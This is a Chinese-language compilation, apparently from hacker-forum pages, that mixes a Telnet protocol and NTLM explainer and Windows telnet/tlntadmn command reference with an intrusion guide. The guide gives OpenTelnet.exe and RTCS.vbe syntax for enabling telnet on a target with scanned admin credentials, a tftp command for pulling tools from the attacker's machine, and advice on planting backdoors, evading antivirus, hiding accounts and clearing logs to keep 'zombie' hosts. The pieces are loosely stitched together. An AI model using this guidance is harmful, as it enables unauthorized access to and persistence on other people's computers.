telnet攻击命令(写出Telnet配置的所有命令)

细说telnet --------------------------------------------------------------------------------一 摘要二 远程登录三 Telnet协议四 Win2000的Telnet服务五 在telnet中该做什么六 结束语一 摘要Telnet的应用不仅方便了我们进行远程登录，也给hacker们提供了又一种入侵手段和后门，但无论如何，在你尽情享受Telnet所带给你的便捷的同时，你是否真正的了解Telnet呢？二 远程登录Telnet服务虽然也属于客户机/服务器模型的服务，但它更大的意义在于实现了基于Telnet协议的远程登录（远程交互式计算），那么就让我们来认识一下远程登录。1 远程登陆的基本概念先来看看什么叫登录：分时系统允许多个用户同时使用一台计算机，为了保证系统的安全和记帐方便，系统要求每个用户有单独的帐号作为登录标识，系统还为每个用户指定了一个口令。用户在使用该系统之前要输入标识和口令，这个过程被称为'登录'。远程登陆是指用户使用Telnet命令，使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器，它只负责把用户输入的每个字符传递给主机，再将主机输出的每个信息回显在屏幕上。2 远程登陆的产生及发展我们可以先构想一个提供远程文字编辑的服务，这个服务的实现需要一个接受编辑文件请求和数据的服务器以及一个发送此请求的客户机。客户机将建立一个从本地机到服务器的TCP连接，当然这需要服务器的应答，然后向服务器发送键入的信息（文件编辑信息），并读取从服务器返回的输出。以上便是一个标准而普通的客户机/服务器模型的服务。似乎有了客户机/服务器模型的服务，一切远程问题都可以解决了。然而实际并非你想象的那样简单，如果我们仅需要远程编辑文件，那么刚才所构想的服务完全可以胜任，但假如我们的要求并不是这么简单，我们还想实现远程用户管理，远程数据录入，远程系统维护，想实现一切可以在远程主机上实现的操作，那么我们将需要大量专用的服务器程序并为每一个可计算服务都使用一个服务器进程，随之而来的问题是：远程机器会很快对服务器进程应接不暇，并淹没在进程的海洋里（我们在这里排除最专业化的远程机器）。那么有没有办法解决呢？当然有，我们可以用远程登录来解决这一切。我们允许用户在远地机器上建立一个登录会话，然后通过执行命令来实现更一般的服务，就像在本地操作一样。这样，我们便可以访问远地系统上所有可用的命令，并且系统设计员不需提供多个专用地服务器程序。问题发展到这里好像前途一片光明了，用远程登录总应该解决问题了吧，但要实现远程登陆并不简单。不考虑网络设计的计算机系统期望用户只从直接相连的键盘和显示器上登录，在这种机器上增加远程登陆功能需要修改机器的操作系统，这是极其艰巨也是我们尽量避免的。因此我们应该集中力量构造远程登陆服务器软件，虽然这样也是比较困难的。为什么说这样做也比较困难呢？举个例子来说：一般，操作系统会为一些特殊按键分配特殊的含义，比如本地系统将'Ctrl+C'解释为：'终止当前运行的命令进程'。但假设我们已经运行了远程登陆服务器软件，'Ctrl+C'也有可能无法被传送到远地机器，如果客户机真的将'Ctrl+C'传到了远地机器，那么'Ctrl+C'这个命令有可能不能终止本地的进程，也就是说在这里很可能会产生混乱。而且这仅仅是遇到的难题之一。但尽管有技术上的困难，系统编程人员还是设法构造了能够应用于大多数操作系统的远程登陆服务器软件，并构造了充当客户机的应用软件。通常，客户机软件取消了除一个键以外的所有键的本地解释，并将这些本地解释相应的转换成远地解释，这就使得客户机软件与远地机器的交互，就如同坐在远程主机面前一样，从而避免了上述所提到的混乱。而那个唯一例外的键，可以使用户回到本地环境。将远程登陆服务器设计为应用级软件，还有另一个要求，那就是需要操作系统提供对伪终端（pseudo terminal）的支持。我们用伪终端描述操作系统的入口点，它允许像Telnet服务器一样的程序向操作系统传送字符，并且使得字符像是来自本地键盘一样。只有使用这样的操作系统，才能将远程登陆服务器设计为应用级软件（比如Telnet服务器软件），否则，本地操作系统和远地系统传送将不能识别从对方传送过来的信息（因为它们仅能识别从本地键盘所键入的信息），远程登陆将宣告失败。将远程登陆服务器设计为应用级软件虽然有其显著的优点：比将代码嵌入操作系统更易修改和控制服务器。但其也有效率不高的缺点（后面的内容将会给予解释），好在用户键入信息的速率不高，这种设计还是可以接受的。3 远程登录的工作过程使用Telnet协议进行远程登陆时需要满足以下条件：在本的计算机上必须装有包含Telnet协议的客户程序；必须知道远程主机的Ip地址或域名；必须知道登录标识与口令。Telnet远程登录服务分为以下4个过程：1）本地与远程主机建立连接。该过程实际上是建立一个TCP连接，用户必须知道远程主机的Ip地址或域名；2）将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT（Net Virtual Terminal）格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报；3）将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端，包括输入命令回显和命令执行结果；4）最后，本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。上面的内容只是讨论了远程登陆最基本的东西，其中的复杂和编程人员的艰辛是我们难以想象的，不知道你在舒服的使用Telnet的同时，是否想到了这些！三 Telnet协议我们知道Telnet服务器软件是我们最常用的远程登录服务器软件，是一种典型的客户机/服务器模型的服务，它应用Telnet协议来工作。那么，什么是Telnet协议？它都具备哪些特点呢？1 基本内容Telnet协议是TCP/IP协议族中的一员，是Internet远程登陆服务的标准协议。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务：1）Telnet定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统，他们只需构造使用标准接口的程序；2）Telnet包括一个允许客户机和服务器协商选项的机制，而且它还提供一组标准选项；3）Telnet对称处理连接的两端，即Telnet不强迫客户机从键盘输入，也不强迫客户机在屏幕上显示输出。2 适应异构为了使多个操作系统间的Telnet交互操作成为可能，就必须详细了解异构计算机和操作系统。比如，一些操作系统需要每行文本用ASCII回车控制符（CR）结束，另一些系统则需要使用ASCII换行符（LF），还有一些系统需要用两个字符的序列回车-换行（CR-LF）；再比如，大多数操作系统为用户提供了一个中断程序运行的快捷键，但这个快捷键在各个系统中有可能不同（一些系统使用CTRL+C，而另一些系统使用ESCAPE）。如果不考虑系统间的异构性，那么在本地发出的字符或命令，传送到远地并被远地系统解释后很可能会不准确或者出现错误。因此，Telnet协议必须解决这个问题。为了适应异构环境，Telnet协议定义了数据和命令在Internet上的传输方式，此定义被称作网络虚拟终端NVT（Net Virtual Terminal）。它的应用过程如下：对于发送的数据：客户机软件把来自用户终端的按键和命令序列转换为NVT格式，并发送到服务器，服务器软件将收到的数据和命令，从NVT格式转换为远地系统需要的格式；对于返回的数据：远地服务器将数据从远地机器的格式转换为NVT格式，而本地客户机将将接收到的NVT格式数据再转换为本地的格式。对于NVT格式的详细定义，有兴趣的朋友可以去查找相关资料。3 传送远地命令我们知道绝大多数操作系统都提供各种快捷键来实现相应的控制命令，当用户在本地终端键入这些快捷键的时候，本地系统将执行相应的控制命令，而不把这些快捷键作为输入。那么对于Telnet来说，它是用什么来实现控制命令的远地传送呢？Telnet同样使用NVT来定义如何从客户机将控制功能传送到服务器。我们知道USASCII字符集包括95个可打印字符和33个控制码。当用户从本地键入普通字符时，NVT将按照其原始含义传送；当用户键入快捷键（组合键）时，NVT将把它转化为特殊的ASCII字符在网络上传送，并在其到达远地机器后转化为相应的控制命令。将正常ASCII字符集与控制命令区分主要有两个原因：1）这种区分意味着Telnet具有更大的灵活性：它可在客户机与服务器间传送所有可能的ASCII字符以及所有控制功能；2）这种区分使得客户机可以无二义性的指定信令，而不会产生控制功能与普通字符的混乱。4 数据流向上面我们提到过将Telnet设计为应用级软件有一个缺点，那就是：效率不高。这是为什么呢？下面给出Telnet中的数据流向：数据信息被用户从本地键盘键入并通过操作系统传到客户机程序，客户机程序将其处理后返回操作系统，并由操作系统经过网络传送到远地机器，远地操作系统将所接收数据传给服务器程序，并经服务器程序再次处理后返回到操作系统上的伪终端入口点，最后，远地操作系统将数据传送到用户正在运行的应用程序，这便是一次完整的输入过程；输出将按照同一通路从服务器传送到客户机。因为每一次的输入和输出，计算机将切换进程环境好几次，这个开销是很昂贵的。还好用户的键入速率并不算高，这个缺点我们仍然能够接受。5 强制命令我们应该考虑到这样一种情况：假设本地用户运行了远地机器的一个无休止循环的错误命令或程序，且此命令或程序已经停止读取输入，那么操作系统的缓冲区可能因此而被占满，如果这样，远地服务器也无法再将数据写入伪终端，并且最终导致停止从TCP连接读取数据，TCP连接的缓冲区最终也会被占满，从而导致阻止数据流流入此连接。如果以上事情真的发生了，那么本地用户将失去对远地机器的控制。为了解决此问题，Telnet协议必须使用外带信令以便强制服务器读取一个控制命令。我们知道TCP用紧急数据机制实现外带数据信令，那么Telnet只要再附加一个被称为数据标记(date mark)的保留八位组，并通过让TCP发送已设置紧急数据比特的报文段通知服务器便可以了，携带紧急数据的报文段将绕过流量控制直接到达服务器。作为对紧急信令的相应，服务器将读取并抛弃所有数据，直到找到了一个数据标记。服务器在遇到了数据标记后将返回正常的处理过程。6 选项协商由于Telnet两端的机器和操作系统的异构性，使得Telnet不可能也不应该严格规定每一个telnet连接的详细配置，否则将大大影响Telnet的适应异构性。因此，Telnet采用选项协商机制来解决这一问题。Telnet选项的范围很广：一些选项扩充了大方向的功能，而一些选项制涉及一些微小细节。例如：有一个选项可以控制Telnet是在半双工还是全双工模式下工作（大方向）；还有一个选项允许远地机器上的服务器决定用户终端类型（小细节）。Telnet选项的协商方式也很有意思，它对于每个选项的处理都是对称的，即任何一端都可以发出协商申请；任何一端都可以接受或拒绝这个申请。另外，如果一端试图协商另一端不了解的选项，接受请求的一端可简单的拒绝协商。因此，有可能将更新，更复杂的Telnet客户机服务器版本与较老的，不太复杂的版本进行交互操作。如果客户机和服务器都理解新的选项，可能会对交互有所改善。否则，它们将一起转到效率较低但可工作的方式下运行。所有的这些设计，都是为了增强适应异构性，可见Telnet的适应异构性对其的应用和发展是多么重要。上面讨论了一些原理方面的东西，虽然我们在Telnet的使用过程中很难接触到这一层面，但我认为了解这些是有意义的，它会给我们带来许多启示。下面让我们来看看Win2000的Telnet服务。（本系列教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区http://ccbirds.yeah.net）四 Win2000的Telnet服务其实从应用层面上，Win2000的Telnet服务并没有什么可说的，绝大部分内容你都可以从HELP文件中得到，我在此只是把它稍微整理一下而已。1 基本配置Win2000为我们提供了Telnet客户机和服务器程序：Telnet.exe是客户机程序（Client），tlntsvr.exe是服务器程序（server），同时它还为我们提供了Telnet服务器管理程序tlntadmn.exe。Windows 2000 默认安装了 Telnet 服务，但是并没有默认启动。下面给出HELP文件中 Telnet 服务的一部分默认设置：AllowTrustedDomain：是否允许域用户访问。默认值是1，允许信任域用户访问。可以改为0: 不允许域用户访问（只允许本地用户）。DefaultDomain：可以对与该计算机具有信任关系的任何域设置。默认值是"."。DefaultShell：显示 shell 安装的路径位置。默认值是： %systemroot%System32Cmd.exe /q /kMaxFailedLogins：在连接终止之前显示尝试登录失败的最大次数。默认是3。LoginScript：显示 Telnet 服务器登录脚本的路径位置。默认的位置就是“%systemroot%System32login.cmd”，你可以更改脚本内容，这样登录进Telnet的欢迎屏幕就不一样了。NTLM：NTLM身份验证选项。默认是2。可以有下面这些值：0: 不使用 NTLM 身份验证。1: 先尝试 NTLM 身份验证，如果失败，再使用用户名和密码。2: 只使用 NTLM 身份验证。TelnetPort：显示 telnet 服务器侦听 telnet 请求的端口。默认是：23。你也可以更改为其他端口。以上各项设置你可以使用tlntadmn.exe（Telnet服务器管理程序）来进行非常方便的配置，配置后需要重新启动Telnet服务。如图12 NTLM提到了telnet就不能不提NTLM，我想这也是让入侵者最为头痛的一件事，哪怕你获得了管理员帐号和密码，想简单通过NTLM也并非易事，况且win2000中的telnet默认仅以NTLM方式验证身份，这就让我们不得不关注NTLM这个东东，那么什么是NTLM呢？早期的SMB协议在网络上明文传输口令，后来出现了"LAN Manager Challenge/Response"验证机制，简称LM，它十分简单以至很容易被破解，微软随后提出了WindowsNT挑战/响应验证机制，即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的：1、客户端首先在本地加密当前用户的密码成为密码散列2、客户端向服务器发送自己的帐号，这个帐号是没有经过加密的，明文直接传输3、服务器产生一个16位的随机数字发送给客户端，作为一个 challenge（挑战）4、客户端再用加密后的密码散列来加密这个 challenge ，然后把这个返回给服务器。作为 response（响应）5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西，发送域控制器6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列，然后使用这个密码散列来加密 challenge。7、域控制器比较两次加密的 challenge ，如果一样，那么认证成功。从上面的过程我们可以看出，NTLM是以当前用户的身份向Telnet服务器发送登录请求的，而不是用你扫到的对方管理员的帐户和密码登录，显然，你的登录将会失败。举个例子来说，你家的机器名为A（本地机器），你入侵的机器名为B（远地机器），你在A上的帐户是xinxin，密码是1234，你扫到B的管理员帐号是Administrator，密码是5678，当你想Telnet到B时，NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作，即用xinxin和1234，而并非用你扫到的Administrator和5678，且这些都是自动完成的，根本不给你插手的机会，因此你的登录操作将失败。由于Telnet服务器对NTLM的使用有3个选项，所以当你Telnet远地机器时，会显示下面情况中的一种：1)身份验证选项=0时=====================================Microsoft (R) Windows (TM) Version 5.00 (Build 2195)Welcome to Microsoft Telnet ServiceTelnet Server Build 5.00.99201.1login:password:\为0时不使用NTML身份验证，直接输入用户名和密码，比如你可以输入扫到的Administrator和56782)身份验证选项=1时=====================================NTLM Authentication failed due to insufficient credentials. Please login withclear text username and passwordMicrosoft (R) Windows (TM) Version 5.00 (Build 2195)Welcome to Microsoft Telnet ServiceTelnet Server Build 5.00.99201.1login:password:\先尝试 NTLM 身份验证，如果失败，再使用用户名和密码，其实这种方式对于我们来说，与上一种方式没什么区别3)身份验证选项=2时=====================================NTLM Authentication failed due to insufficient credentials. Please login withclear text username and passwordServer allows NTLM authentication onlyServer has closed connection遗失对主机的连接。C:>\仔细看看上面的显示，根本没有给你输入用户名和密码的机会，直接断开连接，扫到了密码也是白扫所以对于入侵者来说，NTLM是横在我们面前的一座大山，必须要除掉它，一般我们有如下几种方法：1通过修改远程注册表更改telnet服务器配置，将验证方式从2改为1或0；2使用NTLM.exe，上传后直接运行，可将telnet服务器验证方式从2改为1；3在本地建立扫描到的用户，以此用户身份开启telnet客户机并进行远程登录；4使用软件，比如opentelnet.exe（需要管理员权限且开启IPC管道）5使用脚本，如RTCS，（需要管理员权限但不依赖IPC管道）基本上是以上的5种，其中后两种是我们比较常用的开telnet的手法，而且使用方法十分简单，命令如下：OpenTelnet.exe \server username password NTLMAuthor telnetportOpenTelnet.exe \服务器地址 管理员用户名 密码 验证方式（填0或1） telnet端口cscript RTCS.vbe targetIP username password NTLMAuthor telnetportcscript RTCS.vbe <目标IP> <管理员用户名> <密码> <验证方式>五 在telnet中该做什么本来写到上面就想结束了，不过许多朋友都说telnet上去后不知道该做什么了，既然这样，那我就抛砖引玉吧，这次不讲具体做法，只是说说思路，什么？为什么不讲具体做法？篇幅不够嘛，以后我会一一解释的。1 查看系统信息呵呵，其实就是随处看看，看看他的系统配置和版本（用type c:boot.ini来知道pro版或server版），看看都装了什么服务或软件（从目录名就可以知道了），看看有什么重要或有趣的文件啦（唉，要是国外的机器，看也看不懂），看看他的用户情况，总之就是尽可能多的了解系统，为一会装后门摸底。2 使用tftp传送文件想必大家都遇到过在telnet中传输文件的问题，因为我们习惯了在ipc管道中的文件传输，所以有些朋友喜欢用net share ipc$ 来打开管道，进而利用copy来传输文件。不过这样反而麻烦，既然我们已经得到了shell，我们可以用TFPT命令来完成这一切，什么是TFTP呢？用TFTP(Trivial File Transfer Protocol)来实现文件的传送是一种基于UDP连接的文件传输，一般是使用Windows自带的tftp.exe和一个TFTP服务器端软件构成一个完整的传输结构。它是这样使用的： 首先运行本地的TFTP Server（比如tftpd32.exe）软件并保证始终开启直至传输全部完成， 然后在telnet中（当然你也可以在其他shell中）运行下面的命令：C:>tftp –i ip get xinxin.exe c:abcxinxin.exe其中ip为你自己机器的ip，且上传文件要与TFTP服务器端在同一目录下，这样你就可以把xinxin.exe上传到c盘abc目录下了（其实是从tftp服务器下载来的）需要指出的是，如果使用代理IP，你将不能实现与外部网络的文件传送。因为你的代理网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中，代替你的内部网络地址，所以在外部网络进行MAC寻址时是找不到你这台TFTP服务器的。3 安置后门安置后门放在第二步好像早了点，如果你入侵还有其他目的，比如以破坏为主，或者是来修改主页的，那么这些事情当然可以在安置后门之前做；如果你只是想得到一只肉鸡，那就没什么可说的了，安后门吧。后门的种类繁多，也给我们提供了很大的选择余地，能够根据具体情况选择合适的后门的确是一门学问。常用的后门一般有：木马，asp木马，远程控制软件，克隆帐户，建立并隐藏帐户，telnet，telnet扩展的shell，终端服务等。安置一个好的后门通常要注意以下几点：1 不会被防火墙查杀及阻碍通信：被加入病毒库的后门最好加壳以逃过防火墙，尽量用低端口通信，以免被防火墙屏蔽。2 最大限度增加隐蔽性：如果你选择远程控制软件，要注意被控端的安装提示和小图标，以及是否同步画面；如果你在帐户上做文章，要尽量保持在cmd和用户管理中都不出破绽；如果你选择放木马或telnet扩展，要注意文件和进程的隐藏；如果新开了终端服务（入侵前并没有开），一定要该掉3389这个显眼的端口，且越低越好。3 不要当管理员不存在：这是一个大忌，许多朋友在只有默认帐户的机器上建立类似'hacking'的管理员帐户，真是无知者无畏呀。所以安置后门的时候，想想管理员疏忽的地方会在哪里。4 打补丁：如果想独霸肉鸡，就要会打补丁，要知道对肉鸡的竞争是很激烈的。怎么打补丁呢？这个也要问？想想你是怎么进来的吧。算了，提示一下，除了修补大的漏洞以外（上传官方补丁并运行），也要注意它的共享，ipc$共享（最好都关闭），可疑端口，容易被利用的服务等。不过打补丁也要注意隐蔽性的，不要让管理员发现大的改动。 5 清除日志：可以手动或利用软件，如果不太会就去找相关教材吧，在这里我不详细介绍了。

telnet 命令允许您与使用 Telnet 协议的远程计算机通讯。运行 telnet 时可不使用参数，以便输入由 Telnet 提示符 (telnet>) 表明的 telnet 上下文。可从 Telnet 提示符下，使用下列命令管理运行 Telnet Client 的计算机。 tlntadmn 命令允许您远程管理运行 Telnet Server 的计算机。这些命令都从命令提示符中运行。如果没有使用参数，tlntadmn 将显示本地服务器设置。在 Telnet 提示符下使用 telnet 命令启动 Telnet Client 并输入 Telnet 提示符语法telnet [\RemoteServer]参数\RemoteServer指定要连接的服务器的名称。/?在命令提示符显示帮助。注释不使用参数时，telnet 将启动 Telnet Client。当您在 Telnet 提示符时，必须使用 Telnet 命令。停止 Telnet Client语法quit参数无注释可以将该命令简化为 q。将 Telnet Client 连接到远程计算机语法open [\RemoteServer] [Port]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。Port指定要使用的端口。如果没有指定端口，则假定使用默认端口。注释可以将该命令简化为 o。范例若要通过 44 号端口连接到远程服务器 Redmond，请键入：o redmond 44断开 Telnet Client 与远程计算机的连接语法close [\RemoteServer]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。注释可以将该命令简化为 c。范例若要与远程服务器 Redmond 断开连接，请键入：c redmond44设置 Telnet Client 选项语法set [\RemoteServer] [ntlm] [localecho] [term {ansi | vt100 | vt52 | vtnt}] [escape Character] [logfile FileName] [logging] [bsasdel] [crlf] [delasbs] [mode {console | stream}] [?]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。ntlm打开 NTLM 身份验证（如果在远程服务器上可用）。localecho打开本地回显。term {ansi | vt100 | vt52 | vtnt}将终端设置为所指定的类型。escape Character设置 escape 字符。escape 字符可以是单个字符，也可以是 CTRL 键和字符的组合。若要设置控制键组合，请在键入要分配的字符时按住 CTRL。logfile FileName将文件设置成用于登录 Telnet 活动。日志文件必须位于本地计算机上。设置此选项时，自动开始记录。logging打开日志记录。如果没有设置日志文件，将会出现错误信息。bsasdel将 BACKSPACE 设置成删除键。crlf设置新的行模式，该模式将导致 ENTER 键发送 0x0D、0x0A。delasbs将 DELETE 设置成退格键。mode {console | stream}设置操作模式。?允许查看该命令的完整语法。注释若要在 Telnet 提示符位置关闭上一次设置的选项，请键入：unset [Option]若要设置 escape 字符，请键入：-e Character在 Telnet 的非英文版本上，codeset Option 可用。Codeset Option 将当前代码集设置成下面的某个选项：Shift JIS、 Japanese EUC、 JIS Kanji、 JIS Kanji (78)、 DEC Kanji、 NEC Kanji。应该在远程计算机上设置相同的代码集。发送 Telnet Client 命令语法send [\RemoteServer] [ao] [ayt] [esc] [ip] [synch] [?]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。ao终止输出命令。ayt发送“Are you there?”命令。esc发送当前的转义字符。ip中断过程命令。synch执行 Telnet 同步操作。?允许查看该命令的完整语法。查看 Telnet 客户端的当前设置语法display参数无注释显示命令列出 Telnet 客户端的当前操作参数。如果您在 Telnet 会话中（换句话说，如果您连接到 Telnet 服务器），则可以按 CTRL+} 退出 Telnet 会话以修改参数。若要返回到 Telnet 会话，请按 ENTER 键。在命令提示符使用 tlntadmn 命令管理运行 Telnet Server 的计算机语法tlntadmn [\RemoteServer] [start] [stop] [pause] [continue]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。start启动 Telnet Server。stop停止 Telnet Server。pause中断 Telnet Server。continue恢复 Telnet Server。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。管理 Telnet 会话语法tlntadmn [\RemoteServer] [-s] [-k{SessionID | all}] [-m {SessionID | all} "Message"]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。-s显示活动的 Telnet 会话。-k{SessionID | all}终止会话。键入会话 ID 以终止特定会话，或者键入 all 终止所有会话。-m {SessionID | all} "Message"向一个或多个会话发送消息。键入会话 ID 以便将消息发送给特定会话，或者键入 all 将消息发送给所有会话。在引号内键入要发送的消息（即"Message"）。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。在运行 Telnet Server 的计算机上设置登录选项语法tlntadmn [\RemoteServer] config [auditlocation={eventlog | file | both}] [audit=[{+ | -}admin][{+ | -}user][{+ | -}fail]]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。auditlocation={eventlog | file | both}指定是否将事件信息发送给事件查看程序、文件，或同时发送给这二者。audit=[{+|-}admin][{+|-}user][{+|-}fail]指定要审核哪个事件（管理性登录事件、用户登录事件或失败的登录尝试）。要审核特殊类型的事件，请在该事件类型之前键入加号 (+)。要停止审核特殊类型的事件，请在该事件类型之前键入减号 (-)。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。如果指定发送事件信息的位置但不指定要审核的信息类型，那么只审核关于管理性登录事件的信息，并将其发送到指定位置。范例若要将事件信息发送给事件查看程序，请键入：tlntadmn config auditlocation=eventlog若要审核管理性登录事件和失败的登录尝试，请键入：tlntadmn config audit=+admin +fail在运行 Telnet Server 的计算机上设置默认域语法tlntadmn [\RemoteServer] config [dom=DomainName]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。dom=DomainName指定要设置为默认域的域。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。范例若要使 Redmond 作为本地服务器的默认域，请键入：tlntadmn config dom=Redmond在运行 Telnet Server 的计算机上映射 Alt 键语法tlntadmn [\RemoteServer] config [ctrlakeymap={yes | no}]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。ctrlakeymap={yes | no}指定是否要让 Telnet 服务器把 CTRL+ 翻译为 ALT。键入 yes 映射快捷键，或者键入 no 禁止映射。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。如果不映射 ALT 键，则 Telnet 服务器不会把 ALT 键发送给可能依靠该键的应用程序。在运行 Telnet Server 的计算机上设置连接的最大数量语法tlntadmn [\RemoteServer] config [maxconn=PositiveInteger]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。maxconn=PositiveInteger设置连接的最大数量。必须使用小于 10,000,000 的正整数来指定该数。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。在运行 Telnet Server 的计算机上设置失败登录尝试的最大次数语法tlntadmn [\RemoteServer] config [maxfail=PositiveInteger]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。maxfail=PositiveInteger设置允许用户执行的最大失败登录尝试次数。必须用一个小于 100 的正整数来指定该数。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。在运行 Telnet Server 的计算机上设置操作模式语法tlntadmn [\RemoteServer] config [mode={console | stream}]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。mode={console | stream}指定操作模式。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。在运行 Telnet Server 的计算机上设置 Telnet 端口语法tlntadmn [\RemoteServer] config [port=IntegerValue]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。port=IntegerValue设置 Telnet 端口。必须使用小于 1,024 的整数指定端口。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。在运行 Telnet Server 的计算机上设置身份验证方法语法tlntadmn [\RemoteServer] config [sec=[{+ | -}ntlm][{+ | -}passwd]]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。sec=[{+ | -}ntlm][{+ | -}passwd]指定是否使用 NTLM、密码或这两者对登录尝试进行身份验证。要使用特定类型的身份验证，请在该身份验证类型前键入加号 (+)。要防止使用特定类型的身份验证，请在该类身份验证之前键入减号 (-)。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。NTLM 是两台计算机之间的事务的身份验证协议，而这两台计算机中间至少有一台运行 Windows NT 4.0 或更早版本。另外，NTLM 是为没有加入到域中的计算机（如单机服务器和工作组）提供的身份验证协议。在运行 Telnet Server 的计算机上设置空闲会话超时语法tlntadmn [\RemoteServer] config [timeout=hh:mm:ss]参数\RemoteServer指定要管理的服务器名称。如果没有指定服务器，则假定使用本地服务器。timeout=hh：mm：ss以小时、分钟和秒为单位设置超时时间段。/?在命令提示符显示帮助。注释如果两台计算机都运行 Windows XP，则可以使用 tlntadmn 命令远程管理运行 Telnet Server 的计算机。无法通过 tlntadmn 命令从运行 Windows XP 的计算机远程管理运行 Windows 2000 和 Telnet Server 的计算机。注释 若要从 Telnet Client 切换到命令模式，请在 Telnet 提示符按 CTRL+ ]。若要切回到 Telnet Client，请按 ENTER 键
telnet入侵 首先看下对方机器开了23端口没有
TELNET入侵,要帐号,密码,如果没开的话,可以找个开这TELNET服务的工具,几下就拿下来了,呵呵!
Router不就是路由器么? 后面的#代表是高级用户权限的意思。

Telnet命令是常用的远程登录手段。Telnet当成一种通信协议，但是对于入侵者而言，Telnet只是一种远程登录的工具。一旦用户与远程主机建立了Telnet连接，用户便可以使用目标主机上的软、硬件资源，而用户的本地机只相当于一个只有键盘和显示器的终端而已。telnet命令的特点telnet命令为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序，用它连接到服务器。终端使用者可以在telnet程序中输入命令，这些命令会在服务器上运行，就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话，必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。

